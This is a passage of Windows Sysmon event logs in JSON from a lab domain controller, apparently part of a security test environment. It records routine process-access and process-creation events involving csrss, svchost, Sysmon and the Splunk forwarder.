0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.748","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A3-5F25-0000-001091B11000}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8856,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.748\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A3-5F25-0000-001091B11000}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.748","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A3-5F25-0000-001091B11000}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8857,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.811\r\nProcessGuid: {E2A3D6B1-13A3-5F25-0000-00104BB51000}\r\nProcessId: 4116\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.811","ProcessGuid":"{E2A3D6B1-13A3-5F25-0000-00104BB51000}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8858,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.810\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-13A3-5F25-0000-00104BB51000}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.810","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-13A3-5F25-0000-00104BB51000}","TargetProcessId":"4116","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8859,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.810\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A3-5F25-0000-00104BB51000}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.810","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A3-5F25-0000-00104BB51000}","TargetProcessId":"4116","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8860,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.810\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.810","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8861,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.810\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.810","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8862,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.810\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.810","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8863,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.810\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.810","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
